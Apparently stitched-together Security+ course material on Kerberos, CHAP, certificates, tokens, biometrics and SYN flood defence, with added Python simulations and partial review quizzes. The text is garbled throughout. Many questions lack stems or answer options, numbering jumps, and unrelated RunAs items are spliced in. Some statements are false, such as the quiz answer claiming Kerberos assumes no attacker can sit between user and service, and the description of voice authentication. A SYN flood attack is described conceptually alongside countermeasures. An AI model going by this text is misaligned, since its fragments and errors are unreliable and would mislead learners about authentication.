itinfo.mit.edu/product.php?name=Kerberos
Point out that Kerberos 5 is the current standard today. Point to the Web site where Kerberos security is freely available.
Kerberos provides a means to authenticate users and services over an open multiplatform network using a single login procedure. After the user is authenticated by the system, all subsequent commands and transactions can be carried out securely without any prompting for a password.
Terminology
The Kerberos system consists of the following components:
Principal: Any uniquely named client or server to which Kerberos can assign tickets.
Authentication Server (AS): A network service that authenticates users or services, then supplies ticket-granting tickets to the authorized user or service.
Ticket-Granting Server (TGS): A network service that supplies temporary session keys and tickets to authorized users or services.
Key Distribution Center (KDC): A server running both AS and TGS services; it services both initial ticket and ticket-granting ticket requests.
Realm: An organizational boundary that is formed to provide authentication boundaries. Each realm has an Authentication Server and a Ticket-Granting Server.
Remote Ticket-Granting Server (RTGS): A remote realm's TGS.
The following terms describe types of data that are passed over the network during Kerberos processing:
Credentials: A ticket for the resource server plus a temporary encryption key (session key).
Session key: A temporary encryption key used between the client and resource server, with a lifetime limited to the duration of a single login session.
Authenticator: A record containing information that can be shown to have been recently generated using the session key known only to the client and server. The authenticator is typically valid for five minutes and cannot be reused.
Ticket: A record that helps a client authenticate itself to a server; it contains the client's identity, a session key, a timestamp, and a checksum, all sealed using the resource server's secret key.
Ticket-Granting Ticket (TGT): A ticket that is granted as part of the Kerberos authentication process and used to obtain other tickets from the TGS.
How it works
Kerberos uses encryption technologies to pass a user's credentials over unsecured channels and validate the user for network resources. The process, pictured in Exhibit 2-1, is as follows:
1 When Maria logs on to her workstation with her username and password, the workstation automatically sends a request to the Authenticating Server (AS) for a Ticket-Granting Ticket (TGT). The AS has a database listing the valid users and servers within the scope of its authority (realm) and their master keys.
2 The AS receives the request for a TGT, authenticates Maria, uses her master key to encrypt a new TGT, and sends it back to Maria's workstation. Now that she has a TGT, she does not have to keep authenticating herself to gain access to additional services, at least until the TGT expires. (The TGT is valid for the duration of the logon session, as configured in the account security policy, or until the user disconnects or logs off.)
3 Whenever Maria needs a new service, her workstation sends a copy of the TGT, along with the name of the server that holds the application she needs, an authenticator, and the time period for which she needs access to each service, to the ticket-granting server (TGS), requesting a ticket for each of the services she needs.
4 Once the TGS has verified that Maria is in fact who she says she is, using the session key to access her authenticator, and assuming the TGT matches her to her authenticator, the TGS sends her tickets to use the services she needs.
5 After receiving the appropriate tickets from the TGS, Maria's workstation verifies that each one is for a service that she originally requested, and sends a ticket to each relevant server requesting permission to use its services.
6 Each of the servers that receives a request for service verifies that the request came from the same person, or machine, to which the TGS granted the ticket.
As each server determines that Maria has the authority to use the service requested, it authorizes her to begin using that service. The TGT must be submitted each time Maria needs additional services. Each time the validity period for a previously requested service expires, an entirely new TGT must be obtained.
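As an added example (not the manual's own code and not MIT Kerberos), the Python below walks Maria's logon through the six steps above using the terminology section's components: the AS seals its TGT reply under her master key, the TGS checks the TGT and the five-minute authenticator before issuing a service ticket sealed under the resource server's key, and the resource server verifies both before admitting her. The cipher is a toy SHA-256/HMAC construction standing in for Kerberos encryption, and the principal names, passwords and ticket lifetimes are constructed for the example.

```python
import hashlib
import hmac
import json
import os

AUTHENTICATOR_WINDOW = 300   # the unit says an authenticator is valid for five minutes
TGT_LIFETIME = 8 * 3600      # constructed lifetime standing in for the logon session
TICKET_LIFETIME = 3600       # constructed lifetime for a service ticket

def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """SHA-256 in counter mode; part of the toy cipher, not Kerberos crypto."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]

def seal(key: bytes, record: dict) -> bytes:
    """Toy authenticated encryption of a record (keystream XOR plus HMAC tag).
    It stands in for the Kerberos cipher so the ticket flow stays readable."""
    pt = json.dumps(record).encode()
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()

def unseal(key: bytes, blob: bytes) -> dict:
    """Raises ValueError unless the blob was sealed with exactly this key."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("wrong key or tampered record")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

def master_key(password: str) -> bytes:
    """Principal's master key derived from its password (constructed derivation)."""
    return hashlib.sha256(b"example-realm:" + password.encode()).digest()

class KDC:
    """Key Distribution Center: the AS and the TGS of one realm in one object."""

    def __init__(self, principals: dict):
        self.db = {name: master_key(pw) for name, pw in principals.items()}
        self.tgs_key = os.urandom(32)   # secret known only to the TGS

    def as_exchange(self, client: str, now: int) -> bytes:
        """Steps 1-2: issue a TGT. The reply is sealed with the user's master
        key, so only someone holding Maria's password can read the session key."""
        session_key = os.urandom(32)
        tgt = seal(self.tgs_key, {"client": client, "key": session_key.hex(),
                                  "expires": now + TGT_LIFETIME})
        return seal(self.db[client], {"key": session_key.hex(), "tgt": tgt.hex()})

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str, now: int) -> bytes:
        """Steps 3-4: check the TGT and the authenticator, then issue a ticket
        sealed with the resource server's own key."""
        body = unseal(self.tgs_key, tgt)
        if now > body["expires"]:
            raise PermissionError("TGT expired; an entirely new TGT must be obtained")
        session_key = bytes.fromhex(body["key"])
        auth = unseal(session_key, authenticator)   # only the TGT holder can build this
        if auth["client"] != body["client"] or abs(now - auth["time"]) > AUTHENTICATOR_WINDOW:
            raise PermissionError("authenticator does not match the TGT or is stale")
        svc_key = os.urandom(32)
        ticket = seal(self.db[service], {"client": body["client"], "key": svc_key.hex(),
                                         "expires": now + TICKET_LIFETIME})
        return seal(session_key, {"key": svc_key.hex(), "ticket": ticket.hex()})

def service_accepts(service_key: bytes, ticket: bytes, authenticator: bytes, now: int) -> bool:
    """Steps 5-6: the resource server opens the ticket with its own secret key and
    confirms the authenticator came from the principal the TGS named in it."""
    body = unseal(service_key, ticket)
    auth = unseal(bytes.fromhex(body["key"]), authenticator)
    return (auth["client"] == body["client"] and now <= body["expires"]
            and abs(now - auth["time"]) <= AUTHENTICATOR_WINDOW)

def logon_and_use_service(kdc: KDC, user: str, password: str, service: str, now: int) -> bool:
    """Client side of the whole flow. The service key is read from the KDC
    database only to play the resource server; the client never sees it."""
    reply = unseal(master_key(password), kdc.as_exchange(user, now))
    session_key, tgt = bytes.fromhex(reply["key"]), bytes.fromhex(reply["tgt"])
    authenticator = seal(session_key, {"client": user, "time": now})
    tgs_reply = unseal(session_key, kdc.tgs_exchange(tgt, authenticator, service, now))
    svc_key, ticket = bytes.fromhex(tgs_reply["key"]), bytes.fromhex(tgs_reply["ticket"])
    svc_auth = seal(svc_key, {"client": user, "time": now})
    return service_accepts(kdc.db[service], ticket, svc_auth, now)

def outcome(kdc: KDC, user: str, password: str, service: str, now: int) -> str:
    """Classify a logon attempt so the reason for a failure is visible."""
    try:
        return "ok" if logon_and_use_service(kdc, user, password, service, now) else "rejected"
    except ValueError:
        return "bad password"        # the AS reply cannot be opened
    except PermissionError as exc:
        return f"denied: {exc}"
```

Calling outcome() with a wrong password fails at the very first step, because the AS reply cannot be opened without Maria's master key, while a stale authenticator or an expired TGT is refused by the TGS.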
Exhibit 2-1 (diagram): Client, Authenticating Server (steps 1, 2), Ticket-Granting Server (steps 3, 4), Resource Server (steps 5, 6)
Exhibit 2-2: Cross-realm authentication (diagram): Client, Authenticating Server (steps 1, 2), RTGS (steps 3, 4), Cross-Realm Server (steps 5, 6)
For more information about Kerberos, including initial, preauthentication, invalid, renewable, postdated, proxiable, and forwardable tickets, see RFC 1510. RFCs can be found at the following Web page:
http://www.faqs.org/rfcs/rfc-index.html
Mutual authentication
Mutual authentication is the process by which each party in an electronic communication verifies the identity of the other. For instance, a bank clearly has an interest in positively identifying an account holder prior to allowing a transfer of funds; however, you as a bank customer also have a financial interest in knowing your communication is with the bank's server prior to providing your personal information. Kerberos allows a service to authenticate a recipient so that access to the service is protected. Conversely, it allows the recipient to authenticate the service provider so that rogue services are blocked.
Do it!
B-1:
Discussing Kerberos
3 In very large organizations, Kerberos employs multiple authentication servers, each of which is responsible for a subset of users and servers in the network system. True or false?
True
Once the user has been authenticated, the AS sends the user a ticket-granting ticket (TGT). Once the client has received a TGT, the client presents it to the TGS in order to receive a session key for each requested service. Once the client receives the appropriate ticket from the TGS, the client submits a request to the authentication server.
Eight hours
One hour
Twenty minutes
Five minutes
Two minutes
Introducing CHAP
Explanation The Challenge Handshake Authentication Protocol (CHAP) is an authentication scheme used by Point-to-Point Protocol (PPP) servers to validate the identity of the remote client at the beginning of the communication session or any time throughout the session.
CHAP exchange diagram: Authenticating Server and Peer
CHAP protects against playback attacks by changing the content of the challenge message with each authentication request. The challenge can be repeated at unpredictable intervals while the connection is open, limiting the time of exposure to any single attack, and the server is in control of the frequency and timing of the challenges. For further information on CHAP, see the following Web page:
http://www.ietf.org/rfc/rfc1994.txt
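The exchange described above, as an added Python example that is not part of the manual: the response is the MD5 of Identifier || Secret || Challenge from RFC 1994, and the authenticator issues a fresh random challenge for every authentication and consumes it once, so a response captured on the link is useless when played back later. Peer names and secrets are constructed, and the packet framing of RFC 1994 is omitted.

```python
import hashlib
import hmac
import os


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """Response value from RFC 1994: MD5 over Identifier || Secret || Challenge.
    The secret itself never crosses the link; only this hash does."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class Authenticator:
    """PPP server side. It holds each peer's secret, issues a fresh random
    challenge for every authentication, and accepts each challenge once."""

    def __init__(self, secrets: dict):
        self.secrets = secrets          # peer name -> shared secret
        self.identifier = 0             # one-octet Identifier field, wraps at 256
        self.outstanding = {}           # identifier -> challenge value not yet answered

    def challenge(self) -> tuple:
        self.identifier = (self.identifier + 1) % 256
        value = os.urandom(16)          # unpredictable and different each time
        self.outstanding[self.identifier] = value
        return self.identifier, value

    def verify(self, identifier: int, name: str, response: bytes) -> bool:
        """Recompute the expected hash and compare. The challenge is consumed
        whether or not the response was right, so a captured response is useless."""
        value = self.outstanding.pop(identifier, None)
        if value is None or name not in self.secrets:
            return False
        expected = chap_response(identifier, self.secrets[name], value)
        return hmac.compare_digest(expected, response)


class Peer:
    """Remote client side: answers a challenge with its name and the hash."""

    def __init__(self, name: str, secret: bytes):
        self.name, self.secret = name, secret

    def respond(self, identifier: int, challenge: bytes) -> tuple:
        return self.name, chap_response(identifier, self.secret, challenge)


def exchange(server: Authenticator, peer: Peer) -> tuple:
    """One challenge/response round; returns (accepted, what crossed the wire)."""
    identifier, value = server.challenge()
    name, response = peer.respond(identifier, value)
    wire = (identifier, name, response)  # what an eavesdropper could capture
    return server.verify(identifier, name, response), wire


def session(server: Authenticator, peer: Peer, rechallenges: int) -> list:
    """Initial authentication plus the re-challenges the server sends during the
    session; how often and when is the server's decision."""
    return [exchange(server, peer)[0] for _ in range(1 + rechallenges)]


def replay(server: Authenticator, captured: tuple) -> bool:
    """Playing back a captured response later: its challenge no longer exists."""
    identifier, name, response = captured
    return server.verify(identifier, name, response)
```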
Do it!
C-1:
2 1 3
2 CHAP protects against ___________ attacks by changing the content of the challenge message with each authentication request.
playback
Popular and usually more reputable CAs, such as VeriSign, issue several levels of authentication, based on the amount of data they collect from their applicants. An applicant must usually show up in person to show the company the required documentation to be granted the highest level; less proof is required to receive lower levels of authentication. This means that if a CA wants to succeed in the marketplace, it must be very careful when granting higher levels of authentication. It also means that people need to check the digital certificates they receive from other people and organizations to make sure that a reputable CA issued them. Digital certificates are proving themselves very useful on the Internet because they provide a safe and secure means of digital authentication.
Do it!
D-1:
2 A trusted, third-party entity that verifies the actual identity of an organization or individual before it provides a digital certificate is called a:
A
B
C
3 Symmetric ciphers use the same key to both encrypt and decrypt a message. True or false?
True
4 A digital certificate consists of which of the following? (Choose all that apply.)
A The certificate owner's public key
B The certificate owner's signature
C The certification authority's signature
D The expiration date of the public key
Introduce the concept of something you have versus something you know as it applies to authentication. A security token is like having an ATM card that allows you to begin transactions at automatic teller machines. You must also know the PIN in order to complete the transaction.
Passive tokens
Passive tokens simply act as storage devices for base keys. They share their keys by various means: notches on the token match a receiving device; magnetic strips transmit the key through a card reader; optical bar codes are read by a scanner; and so on. The most common passive tokens are plastic cards with magnetic strips embedded in them. ATM cards, credit cards, card keys that open electronic door locks, and other types of these keys are everywhere today. They are cheap to manufacture and read, and are easy to carry, but unfortunately they are also more easily copied than other types of tokens. This is why many of these types of tokens require that a PIN be produced along with the card. These PINs, like passwords typed into a computer, can easily be obtained by someone glancing over your shoulder.
Active tokens
Unlike a passive token, an active token does not emit or otherwise share its base key. Instead, each time the owner tries to authenticate, it actively creates another form of the base key, such as a one-time password or an encrypted form of the base key, that is not subject to attack.
Originally these types of tokens required the user to read a value and type it into the computer using the keyboard. Increasingly common are tokens that plug directly into the computer. Some examples of this are smart cards, PCMCIA cards, USB tokens, and others that require a proprietary reader. In particular, smart cards offer many advantages and are gaining in popularity. A smart card is a plastic card, about the same size as a credit card, which has an embedded chip with an integrated circuit that provides either memory or memory along with a programmable microprocessor. Smart cards come in different forms (contact, contactless, or hybrid), which either must be plugged into a device to work or need not be. Depending on the amount of memory and the type of microprocessor they have, smart cards can perform a multitude of functions. They can act as an employee badge, a credit card, an electronic building key, or some other access-granting certificate. They can also securely store personal information, such as biometric information, multiple username/password combinations, individual health records, digital certificates, and private/public key infrastructure (PKI) keys.
One-time passwords
A one-time password is a password that is used only once, for a very limited period of time, and then is no longer valid. If it is intercepted at any point, it becomes useless almost immediately. One-time passwords are typically generated using one of two strategies: counter-based or clock-based tokens. A counter-based token is an active token that produces one-time passwords by combining the secret password with a counter that is synchronized with a counter in a server. Normally, you obtain the fresh password by pressing a button on the front of the token. A clock-based token is an active token that produces one-time passwords by combining a secret password with an internal clock. Both of these methods employ means to resynchronize the token's counter or clock if they vary too much from the corresponding server's counter or clock. Although one-time password technologies significantly reduce the risk of attacks relative to static password technologies, they are still open to certain kinds of attack, such as phone line redirection attacks (which divert an authenticated connection to capture transmitted data), IP address theft, and man-in-the-middle attacks.
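As an added example (not from the manual), the Python below models both token types described here: a counter-based token whose server resynchronises through a look-ahead window after the button has been pressed without logging on, and a clock-based token whose server tolerates one step of clock drift while remembering the last accepted step so a code cannot be replayed inside its validity window. The HMAC-SHA1 truncation (HOTP, RFC 4226), the 30-second step and the window sizes are assumptions of the example, as is the seed.

```python
import hashlib
import hmac
import struct

STEP_SECONDS = 30       # constructed clock step for the clock-based token
LOOK_AHEAD = 10         # how far ahead the counter server will resynchronise
CLOCK_SKEW_STEPS = 1    # how many steps of drift the clock server tolerates


def otp(secret: bytes, moving_factor: int, digits: int = 6) -> str:
    """One-time password from the shared secret and a counter or time step.
    Uses the HOTP truncation of an HMAC-SHA1 (RFC 4226); an assumed construction."""
    mac = hmac.new(secret, struct.pack(">Q", moving_factor), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


class CounterToken:
    """Active token with a button: each press advances the counter and shows a code."""

    def __init__(self, secret: bytes):
        self.secret, self.counter = secret, 0

    def press(self) -> str:
        self.counter += 1
        return otp(self.secret, self.counter)


class CounterServer:
    """Server-side counter. Pressing the button without logging on leaves the token
    ahead of the server; the look-ahead window resynchronises the two counters."""

    def __init__(self, secret: bytes, window: int = LOOK_AHEAD):
        self.secret, self.counter, self.window = secret, 0, window

    def verify(self, code: str) -> bool:
        for step in range(1, self.window + 1):
            if hmac.compare_digest(otp(self.secret, self.counter + step), code):
                self.counter += step    # jump forward: earlier codes are now dead
                return True
        return False                    # too far out of sync, or wrong secret


class ClockToken:
    """Active token that combines the secret with its internal clock."""

    def __init__(self, secret: bytes):
        self.secret = secret

    def show(self, now: int) -> str:
        return otp(self.secret, now // STEP_SECONDS)


class ClockServer:
    """Accepts codes from the current step or one step either side (clock drift)
    and remembers the last accepted step so the same code cannot be replayed."""

    def __init__(self, secret: bytes):
        self.secret, self.last_step = secret, -1

    def verify(self, code: str, now: int) -> bool:
        current = now // STEP_SECONDS
        for step in range(current - CLOCK_SKEW_STEPS, current + CLOCK_SKEW_STEPS + 1):
            if step > self.last_step and hmac.compare_digest(otp(self.secret, step), code):
                self.last_step = step
                return True
        return False
```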
Do it!
E-1:
Discussing tokens
2 A passive token holds a microchip in order to perform a function or calculation on the base key information. True or false?
False: This describes an active token.
Topic F: Biometrics
This topic covers the following CompTIA Security+ exam objectives:
1.2 Recognize and be able to differentiate and explain the following methods of authentication: Multi-factor, Biometrics
5.1 Understand the application of the following concepts of physical security: Access Control, Biometrics
6 A computer then analyzes the biometric data and compares it to the data stored in the preexisting template. 7 If the data provided by the current biometric scan sufficiently matches the data stored in the preexisting template, then the person is allowed access to the restricted area. 8 Following the authenticate, authorize, and audit (AAA) model introduced at the beginning of this unit, a record of the authentication should be kept so that an access audit can be performed later.
Exhibit 2-4: Fingerprint scanner by DigitalPersona
A fingerprint scanner can be deployed in a broad range of environments; it provides flexibility and increased system accuracy by allowing users to enroll multiple fingers in the template system. Its weaknesses include the fact that it might not work properly if the fingertip or the device sensor is dirty, and that it is associated with criminality.
Hand geometry
Hand geometry authentication involves the measurement and analysis of different hand measurements. This biometric is relatively easy to use; moreover, simple integration into other systems and processes, combined with an ability to scan people quickly and easily, makes this a popular choice for many companies. Relative to other biometrics, it has limited accuracy, because people's hand measurements are relatively similar to one another. Furthermore, a hand-scanning device (shown in Exhibit 2-5) is rather large and is unsuitable for cramped locations.
Exhibit 2-5: Hand geometry scanner: HandkeyII by Recognition Systems Inc.
Retinal scanning
Retinal scanning involves analyzing the layer of blood vessels located at the back of the eye. This method is highly accurate, is very difficult to spoof, and measures a stable physiological trait. It's difficult to use because it requires the user to focus on a specific point in a receptacle (shown in Exhibit 2-6), and like a hand scanner, it is a relatively large device that would not work well in many situations. This is very expensive technology and might be appropriate only in very high-security areas.
Iris scanning
Iris scanning involves analyzing the patterns of the colored part of the eye surrounding the pupil. It uses a relatively normal camera (shown in Exhibit 2-7) and does not require close contact between the eye and the scanner. Glasses can be worn during an iris scan, unlike a retinal scan. Template matching rates for this technology are very high; however, ease of use is still not very high compared to other methods.
Exhibit 2-7: Iris scanner by Panasonic Authenticam
Facial scanning
Facial scanning biometrics involves analyzing facial characteristics. It is a unique biometric in that it does not require the cooperation of the scanned individual: it can utilize almost any high-resolution image acquisition device, such as a still or motion camera. Although this discussion is primarily concerned with the use of facial scanning to authenticate people trying to gain access to electronic resources, some government agencies are increasingly interested in using publicly placed cameras and driver license photos to help identify and track criminals and terrorists. Weaknesses in this system include the fact that scanning capabilities can be reduced in low light, facial features can change over time, and there are some concerns about the use of this technology on unsuspecting people who do not know they are being scanned.
Behavioral characteristics
Behavioral characteristics are those that are exhibited by an individual, such as the way a person signs her name or speaks a predetermined phrase, rather than characteristics that are actually a part of the physical makeup of that person, such as a fingerprint or the patterns of the iris or retina. Handwritten signature verification analyzes the way people sign their name, such as speed and pressure, as well as the final static shape of the signature itself. Signature scanning (Exhibit 2-8) is relatively accurate and, of course, people are already familiar with it as a form of authentication, which means they might not feel as invaded using this technology as they might with a fingerprint scan. A major weakness in this method is not with the technology, but with the user. Most people do not sign their name in a consistent manner, which can cause a high error rate when using this system to authenticate. Ironically, the presence of a physical signature is often the rationale for not adding more robust authentication methods.
Exhibit 2-8: Signature scanner by Interlink ePad VP9105
Voice authentication relies on voice-to-print technologies, not voice recognition. In this process, your voice is transformed into text and compared to an original template. Although this is fairly easy technology to implement, because many computers already have built-in microphones, the enrollment procedure is more complicated than for other biometrics, and background noise can interfere with the scanning, which can be frustrating to the user.
Multi-factor authentication
There are three commonly recognized factors of authentication:
Something you know, such as a password
Something you have, such as a smart card
Who you are (something about you), such as a biometric
Multi-factor authentication requires that an individual be positively identified using at least one means of authentication from at least two of these three factors. When choosing which methods and how many factors to use to authenticate a person, it's important to consider several implications of your choice. Each method of authentication has certain strengths and weaknesses, and each, appropriately, requires people to exert a varying degree of time and effort to prove they are who they say they are. Adding additional factors of authenticity to your identification process decreases the likelihood that an unauthorized person can compromise your electronic security system, but it also increases the cost of maintaining that system. When deciding the degree of assurance you need about a person's identity, it is important to take into account both the cost of having an unauthorized person compromise your electronic security and the cost of having authorized people authenticate themselves before having access to the data and services they need on your network. As the cost of compromising your electronic security increases, so should your willingness to pay for that security, whether through the purchase and upkeep of hardware and software or through the expense of lost worker productivity.
Authentication
Do it!
F-1:
• Fingerprints
• Hand geometry
• Retinal and iris patterns
• Facial characteristics
• Handwritten signature

• An authorized person is not authenticated
• An unauthorized person is wrongly authenticated
• An authorized person is authenticated but denied access to needed areas
Review questions
1 Which of the following best describes authentication?
A The process of gaining access to resources
B The process of utilizing resources
C
D The process of assigning permissions to users
2 What is the advantage in removing the name of the last user to log on?
A Allows users to share computers
B Requires users to remember their usernames
C
3 Why is password length important?
A Longer passwords are impossible to hack
B
C Windows requires long passwords in a domain environment
D Longer passwords can prevent password cracking programs from working properly
4 What is the password length recommended by most security professionals?
A Six or more characters
B Five or more characters
C Eight or more characters
D

B The complexity of passwords adds to the security of long passwords
C Complex passwords are impossible to crack
D
6 Which of the following is considered a complex password? (Choose all that apply.)
A @1c4htj3
B Pa$$w0rd
C ncdjszkjdnc
D Ajd649sg
7 CHAP stands for Challenge Handshake Authorization Protocol (CHAP). True or false?
False: CHAP stands for Challenge Handshake Authentication Protocol.
8 Which of the following is not a part of the CHAP authentication process?
A The authenticating server compares the value it receives from the peer with the hash value it expects by calculating its own expected hash value.
B
C The peer creates a variable-length value using a one-way hash function on a fixed-length input message.
D The authenticating server issues new challenge messages to the peer at random intervals throughout the communication session.
E The CHAP authentication process starts after the authenticating server tells the peer that CHAP will be used.
CompTIA Security+ Certification
9 There are many different password conventions; what are basic rules to follow in order to safeguard your passwords? (Choose all that apply.)
A Passwords must be memorized. If they must be written down, the written records must be locked up.
B Each password you choose must be different from any other that you use.
C Passwords must be at least six characters long, and probably longer, depending on the size of the character set used.
D Passwords must contain a mixture of letters (both uppercase and lowercase), numbers, and other characters, such as %, !, or &.
E Passwords must be changed periodically.
10 Kerberos assumes that none of the workstations or servers is physically secure and that bad guys can position themselves between the user and the service being sought. True or false?
False: Kerberos assumes that workstations, servers, and other devices that are connected to the network are physically secure, and that there is no way for an attacker to gain access to a password by establishing a position between the user and the service being sought.
11 In a Kerberos system, after a client has received a ticket from an authentication server, it creates and adds an authentication that contains the user's username and time stamp. True or false?
True
12 The authenticator in a CHAP session must return either a success or failure message to the sender once it has compared the expected hash value to the actual hash value. True or false?
True
14 An active token is a device that creates and shares modified or encrypted forms of the base key. True or false?
True
C Dictionary attacks
D Man-in-the-middle attacks
16 Which of the following is an example of a biometric? (Choose all that apply.)
A Complex passwords
B
C
D Smart cards
17 A biometric that involves the measurement and analysis of different hand characteristics and measurements is called:
A Fingerprints
B Facial recognition
C Hand geometry
D All of the above
18 A biometric that involves analyzing voice characteristics and measurements is called:
A Voice-to-print technology
B Facial recognition
C Sound technology
D Voice authentication
7 Which of the following is a disadvantage of the RunAs command? (Choose all that apply.)
A Opens potential security holes
B Allows users to install applications if they know the local administrator password
C Allows users to access administrative tools if they know the local administrator password
D Allows users to change account permissions
8 How can you use RunAs on an existing shortcut?
A Hold down the Alt key and right-click the shortcut
B Right-click the shortcut
C
D Hold down the Ctrl key and right-click the shortcut
9 What application should you not use RunAs to execute?
A A virus scanner
B An e-mail application
C A word processor
D An auditing program
10 How can you prevent users from using RunAs?
A Delete the RunAs command
B
service (DoS) attacks, including SYN flood, Smurf, Ping of Death, and Distributed Denial of Service (DDoS) attacks.
B Identify man-in-the-middle attacks.
C Recognize the major types of spoofing attacks, including IP address spoofing, ARP poisoning, Web spoofing, and DNS spoofing.
D Discuss replay attacks.
E Explain TCP session hijacking.
F Detail various types of social-engineering
encrypted data.
H List the major types of attacks used against encrypted data.
SYN flood
A SYN flood attack prevents users from accessing a target server by flooding it with half-open TCP connections. Normal TCP connections between two hosts are arranged with an exchange of three packets.
1 The first packet is sent from the client to the server with the SYN flag set.
2 The server acknowledges the session by replying with a packet that has both the SYN and the ACK flags set (a SYN/ACK packet).
3 The client responds to the server with an ACK packet. The TCP session is completely established, and the two hosts are able to exchange data.
If, for some reason, the client doesn't complete the connection by sending the ACK packet, the server waits a couple of minutes, giving the client plenty of time to respond, before clearing the uncompleted connection from memory and making it available for use by others. The TCP session setup process is shown in Exhibit 3-1.
If students question what the abbreviations in the Exhibit mean: SEQ is the packet sequence number, CTL is the control flag, SYN is the synchronize control flag, and ACK is acknowledgement. More information about three-way handshakes can be found in RFC 793.
Exhibit 3-1: TCP three-way handshake

Although most computer systems can handle many established network connections, they usually can handle only a handful of connections that are in the process of being established (half-open connections). This is because connections are usually set up in such a short amount of time that there is no need for a long queue for half-open connections.

Conducting SYN flood attacks
An attacker can render a machine unavailable to network users by filling the half-open connections queue without permitting the connections to be completed and moved into the list of fully open connections. This is accomplished by flooding the server with SYN packets that have a spoofed source address. The server responds with a SYN/ACK packet to the fake source address but never receives the ACK reply, which is needed to complete the TCP connection. The server cannot accept any more TCP connections until the half-open connections time out, so legitimate users can be prevented from reaching the server.
Countermeasures
Many commercial firewall products have features to reduce the effect of SYN floods. The firewall sits between the attacking client machine and the attacked server, so it has the ability to withhold or insert packets into the data stream as necessary to thwart SYN floods. One strategy used by firewalls is to immediately respond to the server's SYN/ACK packet with an ACK that uses the spoofed IP address of the client, as shown in Exhibit 3-2. This permits the server to move the session out of the half-open connections queue. If the connection is a legitimate one, the client shortly responds with its own ACK packet, which the firewall can forward to the server with no negative impact. If the connection is not legitimate, then no ACK is forthcoming from the client. In this case, the firewall can safely kill the TCP session by sending the server an RST (reset) packet. This is just one example of how firewalls can mitigate the effect of SYN floods; every firewall manufacturer has its own strategy. Other countermeasures include:
• Increase the size of the server's half-open connection queue.
• Decrease the queue's time-out period, limiting the number of half-open connections from a single IP.
• Use network-based intrusion detection systems that can detect SYN floods and notify administrators.
Exhibit 3-2: Defending against the SYN flood

SynAttackProtect
You can protect your server from SYN floods with the TCP/IP parameter SynAttackProtect, which enables SYN flood attack protection. A value of 1 enables this protection if the TcpMaxConnectResponseRetransmissions value is at least 2. The protection detects SYN flooding and then reduces the time spent on connection requests that can't be acknowledged. This entry can be added to Windows Server 2003 through Regedit.
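The half-open queue behaviour described above, and the "many SYNs, no ACKs, scattered sources" pattern a network intrusion detection system looks for, as an added example that is not from the manual. It replays constructed packet records against a model of the server's queue; the server address 10.0.0.5, the client addresses, the queue size and the timeout are all assumed values.

```python
from dataclasses import dataclass


# Constructed packet records for a server at 10.0.0.5. Flags: "S" = client SYN,
# "A" = client ACK that completes the handshake. The server's SYN/ACK is implied.
@dataclass(frozen=True)
class Pkt:
    t: float      # arrival time in seconds
    src: str      # source IP address
    dst: str      # destination IP address
    flags: str


HALF_OPEN_TIMEOUT = 120.0   # seconds a half-open entry is kept ("a couple of minutes")
QUEUE_LIMIT = 8             # half-open slots; deliberately small to show exhaustion


class HalfOpenTracker:
    """Models the server's half-open connection queue.

    A SYN takes a slot; the client's ACK frees it (handshake completed);
    an entry older than the timeout is dropped (handshake never completed).
    """

    def __init__(self, server_ip, limit=QUEUE_LIMIT, timeout=HALF_OPEN_TIMEOUT):
        self.server_ip = server_ip
        self.limit = limit
        self.timeout = timeout
        self.half_open = {}      # src IP -> time the SYN arrived
        self.completed = 0       # handshakes finished with an ACK
        self.refused = 0         # SYNs turned away because the queue was full
        self.expired = 0         # entries dropped after the timeout

    def _expire(self, now):
        for src, t0 in list(self.half_open.items()):
            if now - t0 > self.timeout:
                del self.half_open[src]
                self.expired += 1

    def feed(self, pkt):
        self._expire(pkt.t)
        if pkt.dst != self.server_ip:
            return
        if pkt.flags == "S":
            if len(self.half_open) >= self.limit:
                self.refused += 1            # legitimate clients see this as "server down"
            else:
                self.half_open.setdefault(pkt.src, pkt.t)
        elif pkt.flags == "A" and pkt.src in self.half_open:
            del self.half_open[pkt.src]
            self.completed += 1

    def flood_suspected(self):
        """Detection heuristic: the queue is saturated while almost no handshakes complete."""
        return len(self.half_open) >= self.limit and self.completed <= self.limit // 4


def run_trace(packets, server_ip="10.0.0.5"):
    """Replay a packet list in time order and report the queue state at the end."""
    tr = HalfOpenTracker(server_ip)
    for p in sorted(packets, key=lambda p: p.t):
        tr.feed(p)
    return {"half_open": len(tr.half_open), "completed": tr.completed,
            "refused": tr.refused, "expired": tr.expired, "flood": tr.flood_suspected()}


def constructed_trace():
    """Two honest clients, then a burst of SYNs from spoofed sources that never ACK."""
    pkts = []
    for i, ip in enumerate(["192.0.2.10", "192.0.2.11"]):
        pkts += [Pkt(i, ip, "10.0.0.5", "S"), Pkt(i + 0.05, ip, "10.0.0.5", "A")]
    for n in range(12):                      # 12 spoofed SYNs against 8 slots
        pkts.append(Pkt(5 + n * 0.01, f"203.0.113.{n + 1}", "10.0.0.5", "S"))
    pkts += [Pkt(6, "192.0.2.12", "10.0.0.5", "S"),   # honest client during the flood
             Pkt(6.05, "192.0.2.12", "10.0.0.5", "A")]
    return pkts


if __name__ == "__main__":
    print(run_trace(constructed_trace()))
```

Appending a SYN two hundred seconds later shows the other half of the story: the stale entries expire and the queue accepts connections again.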
A-1:
Here's how
1 Log on to the Windows Server 2003 server as Administrator
7 Expand Services
8 Expand Tcpip
9 Select Parameters
10 Right-click Parameters
11 Choose New, DWORD Value
Enter SynAttackProtect
12 Right-click SynAttackProtect
Choose Modify
To start the process of changing the parameter value.
13 In the Value Data field, enter 1
Click OK
A value of 1 enables the parameter.
14 Close the Registry Editor window
Smurf
Explanation
